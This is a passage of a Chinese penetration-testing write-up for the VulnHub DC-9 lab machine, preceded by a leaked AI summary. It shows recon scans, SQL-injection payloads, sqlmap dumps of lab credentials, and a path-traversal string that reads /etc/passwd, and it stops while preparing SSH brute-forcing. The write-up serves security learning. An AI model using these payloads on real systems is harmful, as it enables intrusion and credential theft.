好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。用户已经提供了文章的详细内容,包括信息收集、漏洞利用和权限维持等部分。 首先,我要快速浏览文章,抓住主要步骤。文章描述了对DC-9渗透测试靶机的解题过程,使用了信息收集工具如arp-scan和nmap,发现了目标IP和开放端口。然后进行了目录探测和SQL注入测试,成功利用sqlmap脱库获取了数据库中的用户名和密码。 接下来,用户尝试SSH爆破,并发现目标系统使用了knockd服务来隐藏SSH端口。通过发送特定的序列号敲门后,成功开启了SSH服务,并爆破得到了多个用户的登录凭证。 在权限维持阶段,用户查看了sudo权限,并找到了一个可提权的脚本test.py。通过构造passwd文件并利用该脚本追加root权限的用户信息,最终成功提权并获得了系统的控制权。 最后,文章提醒读者这些技术仅适用于授权环境或CTF比赛,强调合规和责任的重要性。 总结时需要涵盖信息收集、SQL注入、SSH爆破、提权以及合规提醒这几个关键点。同时要确保语言简洁明了,控制在100字以内。 </think> 文章记录了对DC-9渗透测试靶机的解题过程。通过信息收集发现目标IP及开放端口80和22;利用SQL注入漏洞脱库获取用户名密码;通过SSH爆破结合knockd服务动态开启端口成功登录;最终通过构造passwd文件并利用sudo权限提权至root。整个过程强调合规性和技术学习目的。 2026-2-26 11:49:55 Author: www.freebuf.com(查看原文) 阅读量:4 收藏
免责声明:本文记录的是 DC-9 渗透测试靶机 的解题过程,所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用,请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规,自觉维护网络空间安全。
环境:
https://download.vulnhub.com/dc/DC-9.zip
一、信息收集
1、探测目标IP地址
arp-scan -l #探测当前网段的所有ip地址
┌──(root㉿kali)-[~]
└─# arp-scan -l #探测当前网段的所有ip地址
Interface: eth0, type: EN10MB, MAC: 00:0c:29:42:f5:0c, IPv4: 192.168.0.4
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1 00:50:56:e1:0c:3c VMware, Inc.
192.168.0.3 00:50:56:c0:00:08 VMware, Inc.
192.168.0.114 00:0c:29:41:2f:cf VMware, Inc.
192.168.0.254 00:50:56:e9:c6:38 VMware, Inc.
7 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.010 seconds (127.36 hosts/sec). 4 responded
nmap -sP 192.168.0.0/24
┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.0.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-14 05:20 EST
Nmap scan report for 192.168.0.1
Host is up (0.00028s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.0.2
Host is up (0.000072s latency).
MAC Address: 00:50:56:F2:CF:16 (VMware)
Nmap scan report for 192.168.0.114
Host is up (0.000074s latency).
MAC Address: 00:0C:29:19:1A:7B (VMware)
Nmap scan report for 192.168.0.254
Host is up (0.000088s latency).
MAC Address: 00:50:56:F8:33:06 (VMware)
Nmap scan report for 192.168.0.10
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.01 seconds
目标IP:192.168.0.114
2、探测目标IP开放端口
nmap -sV -p- 192.168.0.114
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.0.114
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-14 05:21 EST
Nmap scan report for 192.168.0.114
Host is up (0.00048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
MAC Address: 00:0C:29:19:1A:7B (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds
端口:80和22
3、目录探测
dirsearch -u http://192.168.0.114
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.0.114
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.0.114/_25-11-14_05-21-26.txt
Target: http://192.168.0.114/
[05:21:26] Starting:
[05:21:27] 403 - 278B - /.ht_wsr.txt
[05:21:27] 403 - 278B - /.htaccess.bak1
[05:21:27] 403 - 278B - /.htaccess.orig
[05:21:27] 403 - 278B - /.htaccess.sample
[05:21:27] 403 - 278B - /.htaccess.save
[05:21:27] 403 - 278B - /.htaccess_extra
[05:21:27] 403 - 278B - /.htaccess_orig
[05:21:27] 403 - 278B - /.htaccess_sc
[05:21:27] 403 - 278B - /.htaccessBAK
[05:21:27] 403 - 278B - /.htaccessOLD
[05:21:27] 403 - 278B - /.htaccessOLD2
[05:21:27] 403 - 278B - /.htm
[05:21:27] 403 - 278B - /.html
[05:21:27] 403 - 278B - /.htpasswd_test
[05:21:27] 403 - 278B - /.htpasswds
[05:21:27] 403 - 278B - /.httr-oauth
[05:21:28] 403 - 278B - /.php
[05:21:35] 200 - 0B - /config.php
[05:21:36] 301 - 312B - /css -> http://192.168.0.114/css/
[05:21:37] 200 - 1001B - /display.php
[05:21:40] 200 - 407B - /includes/
[05:21:40] 301 - 317B - /includes -> http://192.168.0.114/includes/
[05:21:41] 302 - 0B - /logout.php -> manage.php
[05:21:42] 200 - 548B - /manage.php
[05:21:47] 200 - 485B - /search.php
[05:21:47] 403 - 278B - /server-status
[05:21:47] 403 - 278B - /server-status/Task Completed
4、网页信息收集
http://192.168.0.114:80
二、漏洞利用
1、查看页面
2、Yakit测试SQL注入
成功抓包
POST /results.php HTTP/1.1
Host: 192.168.0.114
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Referer: http://192.168.0.114/search.php
Accept-Encoding: gzip, deflate
Origin: http://192.168.0.114
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Content-Length: 13search={{randstr(10,10,1)}}
POST /results.php HTTP/1.1
Host: 192.168.0.114
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Referer: http://192.168.0.114/search.php
Accept-Encoding: gzip, deflate
Origin: http://192.168.0.114
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Content-Length: 13search=1{{payload(mysql-payloads-fuzz)}}
POST /results.php HTTP/1.1
Host: 192.168.0.114
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Referer: http://192.168.0.114/search.php
Accept-Encoding: gzip, deflate
Origin: http://192.168.0.114
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Content-Length: 13search=11' or '1'='1
响应
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2025 04:39:37 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3641<!doctype html>
<html>
<head>
<meta charset="UTF-8" />
<title>Example.com - Staff Details - Welcome</title>
<link rel="stylesheet" type="text/css" href="css/style.css" />
</head><body>
<div class="wrapper">
<header>
<div class="inner">Example.com - Staff Details</div>
</header>
<nav>
<div class="inner">
<ul>
<a href="index.php"><li>Home</li></a>
<a href="display.php"><li>Display All Records</li></a>
<a href="search.php"><li>Search</li></a>
<a href="manage.php"><li>Manage</li></a>
</ul>
</div>
</nav><div class="main">
<div class="inner">
<h3>Search results</h3>ID: 1<br />Name: Mary Moe<br />Position: CEO<br />Phone No:
46478415155456<br />Email: [email protected]<br /><br />ID: 2<br />Name:
Julie Dooley<br />Position: Human Resources<br />Phone No:
46457131654<br />Email: [email protected]<br /><br />ID: 3<br />Name:
Fred Flintstone<br />Position: Systems Administrator<br />Phone No:
46415323<br />Email: [email protected]<br /><br />ID: 4<br />Name:
Barney Rubble<br />Position: Help Desk<br />Phone No: 324643564<br />Email:
[email protected]<br /><br />ID: 5<br />Name: Tom Cat<br />Position:
Driver<br />Phone No: 802438797<br />Email: [email protected]<br /><br />ID:
6<br />Name: Jerry Mouse<br />Position: Stores<br />Phone No:
24342654756<br />Email: [email protected]<br /><br />ID: 7<br />Name:
Wilma Flintstone<br />Position: Accounts<br />Phone No: 243457487<br />Email:
[email protected]<br /><br />ID: 8<br />Name: Betty Rubble<br />Position:
Junior Accounts<br />Phone No: 90239724378<br />Email:
[email protected]<br /><br />ID: 9<br />Name: Chandler Bing<br />Position:
President - Sales<br />Phone No: 189024789<br />Email:
[email protected]<br /><br />ID: 10<br />Name: Joey Tribbiani<br />Position:
Janitor<br />Phone No: 232131654<br />Email: [email protected]<br /><br />ID:
11<br />Name: Rachel Green<br />Position: Personal Assistant<br />Phone
No: 823897243978<br />Email: [email protected]<br /><br />ID: 12<br />Name:
Ross Geller<br />Position: Instructor<br />Phone No: 6549638203<br />Email:
[email protected]<br /><br />ID: 13<br />Name: Monica Geller<br />Position:
Marketing<br />Phone No: 8092432798<br />Email: [email protected]<br /><br />ID:
14<br />Name: Phoebe Buffay<br />Position: Assistant Janitor<br />Phone
No: 43289079824<br />Email: [email protected]<br /><br />ID: 15<br />Name:
Scooter McScoots<br />Position: Resident Cat<br />Phone No:
454786464<br />Email: [email protected]<br /><br />ID: 16<br />Name:
Donald Trump<br />Position: Replacement Janitor<br />Phone No:
65464646479741<br />Email: [email protected]<br /><br />ID: 17<br />Name:
Scott Morrison<br />Position: Assistant Replacement Janitor<br />Phone
No: 47836546413<br />Email: [email protected]<br /><br />
<br /><br /><button class="btnfloat" onclick="goBack()">Go Back</button>
<script>
function goBack() {
window.history.back();
}
</script>
</div>
</div><br /><br />
<div class="clearfix"></div>
<br />
<footer>
<div class="inner"></div>
</footer>
</div>
</body>
</html>
3、保存原始数据包,直接放入到sqlmap当中进行执行
POST /results.php HTTP/1.1
Host: 192.168.0.114
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Referer: http://192.168.0.114/search.php
Accept-Encoding: gzip, deflate
Origin: http://192.168.0.114
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Content-Length: 13search=1
sqlmap -r 1.txt --random-agent --batch --current-db --is-dba --dbs
┌──(root㉿kali)-[~]
└─# sqlmap -r 1.txt --random-agent --batch --current-db --is-dba --dbs
___
__H__
___ ___[,]_____ ___ ___ {1.9.8#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:43:02 /2025-11-21/
[23:43:02] [INFO] parsing HTTP request from '1.txt'
[23:43:02] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; fr-fr) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[23:43:02] [INFO] testing connection to the target URL
[23:43:02] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:43:02] [INFO] testing if the target URL content is stable
[23:43:03] [INFO] target URL content is stable
[23:43:03] [INFO] testing if POST parameter 'search' is dynamic
[23:43:03] [WARNING] POST parameter 'search' does not appear to be dynamic
[23:43:03] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[23:43:03] [INFO] testing for SQL injection on POST parameter 'search'
[23:43:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:43:03] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[23:43:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[23:43:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:43:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[23:43:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:43:03] [INFO] testing 'Generic inline queries'
[23:43:03] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[23:43:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[23:43:03] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[23:43:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[23:43:23] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[23:43:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:43:23] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:43:23] [INFO] target URL appears to be UNION injectable with 6 columns
[23:43:23] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 3684 FROM (SELECT(SLEEP(5)))sqDb) AND 'bZhR'='bZhRType: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a627a71,0x44746b55667765556861734479754c7a6851426f7a4958554f617746736b73777071434e6e554d42,0x716a6b7171),NULL-- -
---
[23:43:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[23:43:23] [INFO] fetching current database
current database: 'Staff'
[23:43:23] [INFO] testing if current user is DBA
[23:43:23] [INFO] fetching current user
[23:43:23] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[23:43:23] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users[23:43:23] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.0.114'
[*] ending @ 23:43:23 /2025-11-21/
数据库:
available databases [3]:
[*] information_schema
[*] Staff
[*] users
脱库
sqlmap -r 1.txt --random-agent --batch --current-db --is-dba --dbs -D Staff --dump
┌──(root㉿kali)-[~]
└─# sqlmap -r 1.txt --random-agent --batch --current-db --is-dba --dbs -D Staff --dump
___
__H__
___ ___[,]_____ ___ ___ {1.9.8#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:45:25 /2025-11-21/
[23:45:25] [INFO] parsing HTTP request from '1.txt'
[23:45:25] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[23:45:25] [INFO] resuming back-end DBMS 'mysql'
[23:45:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 3684 FROM (SELECT(SLEEP(5)))sqDb) AND 'bZhR'='bZhRType: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a627a71,0x44746b55667765556861734479754c7a6851426f7a4958554f617746736b73777071434e6e554d42,0x716a6b7171),NULL-- -
---
[23:45:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[23:45:25] [INFO] fetching current database
current database: 'Staff'
[23:45:25] [INFO] testing if current user is DBA
[23:45:25] [INFO] fetching current user
[23:45:25] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[23:45:25] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users[23:45:25] [INFO] fetching tables for database: 'Staff'
[23:45:25] [INFO] fetching columns for table 'Users' in database 'Staff'
[23:45:25] [INFO] fetching entries for table 'Users' in database 'Staff'
[23:45:25] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[23:45:25] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[23:45:25] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[23:45:25] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[23:45:25] [INFO] starting 4 processes
[23:45:31] [WARNING] no clear password(s) found
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password | Username |
+--------+----------------------------------+----------+
| 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin |
+--------+----------------------------------+----------+[23:45:31] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.0.114/dump/Staff/Users.csv'
[23:45:31] [INFO] fetching columns for table 'StaffDetails' in database 'Staff'
[23:45:31] [INFO] fetching entries for table 'StaffDetails' in database 'Staff'
Database: Staff
Table: StaffDetails
[17 entries]
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| id | email | phone | lastname | reg_date | firstname | position |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| 1 | [email protected] | 46478415155456 | Moe | 2019-05-01 17:32:00 | Mary | CEO |
| 2 | [email protected] | 46457131654 | Dooley | 2019-05-01 17:32:00 | Julie | Human Resources |
| 3 | [email protected] | 46415323 | Flintstone | 2019-05-01 17:32:00 | Fred | Systems Administrator |
| 4 | [email protected] | 324643564 | Rubble | 2019-05-01 17:32:00 | Barney | Help Desk |
| 5 | [email protected] | 802438797 | Cat | 2019-05-01 17:32:00 | Tom | Driver |
| 6 | [email protected] | 24342654756 | Mouse | 2019-05-01 17:32:00 | Jerry | Stores |
| 7 | [email protected] | 243457487 | Flintstone | 2019-05-01 17:32:00 | Wilma | Accounts |
| 8 | [email protected] | 90239724378 | Rubble | 2019-05-01 17:32:00 | Betty | Junior Accounts |
| 9 | [email protected] | 189024789 | Bing | 2019-05-01 17:32:00 | Chandler | President - Sales |
| 10 | [email protected] | 232131654 | Tribbiani | 2019-05-01 17:32:00 | Joey | Janitor |
| 11 | [email protected] | 823897243978 | Green | 2019-05-01 17:32:00 | Rachel | Personal Assistant |
| 12 | [email protected] | 6549638203 | Geller | 2019-05-01 17:32:00 | Ross | Instructor |
| 13 | [email protected] | 8092432798 | Geller | 2019-05-01 17:32:00 | Monica | Marketing |
| 14 | [email protected] | 43289079824 | Buffay | 2019-05-01 17:32:02 | Phoebe | Assistant Janitor |
| 15 | [email protected] | 454786464 | McScoots | 2019-05-01 20:16:33 | Scooter | Resident Cat |
| 16 | [email protected] | 65464646479741 | Trump | 2019-12-23 03:11:39 | Donald | Replacement Janitor |
| 17 | [email protected] | 47836546413 | Morrison | 2019-12-24 03:41:04 | Scott | Assistant Replacement Janitor |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+[23:45:31] [INFO] table 'Staff.StaffDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.0.114/dump/Staff/StaffDetails.csv'
[23:45:31] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.0.114'[*] ending @ 23:45:31 /2025-11-21/
users数据表当中发现用户名和密码,将密码进行md5解密
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password | Username |
+--------+----------------------------------+----------+
| 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin |
+--------+----------------------------------+----------+
用户名:admin
密码:transorbital1
由于使用的当前数据库为Staff,所以可以直接判断出此用户名和密码即为后台管理员用户名和密码。
知道此,那么还有另一个数据库,继续脱库
sqlmap -r 1.txt --random-agent --batch --current-db --is-dba --dbs -D users --dump
┌──(root㉿kali)-[~]
└─# sqlmap -r 1.txt --random-agent --batch --current-db --is-dba --dbs -D users --dump
___
__H__
___ ___[(]_____ ___ ___ {1.9.8#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:46:57 /2025-11-21/
[23:46:57] [INFO] parsing HTTP request from '1.txt'
[23:46:57] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[23:46:57] [INFO] resuming back-end DBMS 'mysql'
[23:46:57] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 3684 FROM (SELECT(SLEEP(5)))sqDb) AND 'bZhR'='bZhRType: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a627a71,0x44746b55667765556861734479754c7a6851426f7a4958554f617746736b73777071434e6e554d42,0x716a6b7171),NULL-- -
---
[23:46:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[23:46:57] [INFO] fetching current database
current database: 'Staff'
[23:46:57] [INFO] testing if current user is DBA
[23:46:57] [INFO] fetching current user
[23:46:57] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[23:46:57] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users[23:46:57] [INFO] fetching tables for database: 'users'
[23:46:57] [INFO] fetching columns for table 'UserDetails' in database 'users'
[23:46:57] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+[23:46:57] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.0.114/dump/users/UserDetails.csv'
[23:46:57] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.0.114'[*] ending @ 23:46:57 /2025-11-21/
拿到大量的用户名和密码信息,保存下来
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
4、登入后台
拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd
用户名:admin
密码:transorbital1
登陆成功
发现存在文件包含点
?file=../../../../etc/passwd
经过测试,成功
5、SSH爆破
将之前保存下来的这些用户名和密码,进行爆破
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
创建用户名字典文件 (user.txt)
